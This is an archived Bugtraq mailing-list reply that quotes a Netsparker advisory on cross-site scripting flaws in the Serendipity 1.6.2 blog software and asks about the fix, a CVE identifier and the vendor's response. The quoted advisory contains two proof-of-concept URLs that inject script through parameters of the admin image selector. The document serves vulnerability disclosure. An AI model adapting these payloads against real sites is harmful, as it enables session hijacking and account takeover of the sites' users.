Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: [Full-disclosure] XSS Vulnerabilities in Serendipity
From: Henri Salo <henri () nerv fi>
Date: Fri, 19 Jul 2013 13:33:56 +0300

On Fri, Jul 12, 2013 at 02:29:52PM +0300, Netsparker Advisories wrote:
Information
--------------------
Name :  XSS Vulnerabilities in Serendipity
Software :  Serendipity 1.6.2 and possibly below.
Vendor Homepage :  http://www.s9y.org/
Vulnerability Type :  Cross-Site Scripting
Severity :  Medium
Researcher :  Omar Kurt
Advisory Reference :  NS-13-003

Description
--------------------
Serendipity is a PHP-powered weblog application which gives the user an
easy way to maintain an online diary, weblog or even a complete homepage.
While the default package is designed for the casual blogger, Serendipity
offers a flexible, expandable and easy-to-use framework with the power for
professional applications.

Details
--------------------
Serendipity is affected by XSS vulnerabilities in version 1.6.2.

http://example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117

You can read the full article about Cross-Site Scripting from here :
http://www.mavitunasecurity.com/crosssite-scripting-xss/

Solution
--------------------
The vendor fixed this vulnerability in the new version. Please see the
references.

Advisory Timeline
--------------------
26/02/2013 - First contact
04/03/2013 - Sent the details
10/07/2013 - Advisory released

References
--------------------
Vendor Url / Patch : -
MSL Advisory Link :
https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity/
Netsparker Advisories :
http://www.mavitunasecurity.com/netsparker-advisories/

So is this fixed in version 1.7? No vendor URL/path listed in your references.
Does this vulnerability have CVE identifier? What was vendor response?

---
Henri Salo

Attachment: signature.asc
Description: Digital signature


  By Date           By Thread  

Current thread:
  • Re: [Full-disclosure] XSS Vulnerabilities in Serendipity Henri Salo (Jul 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault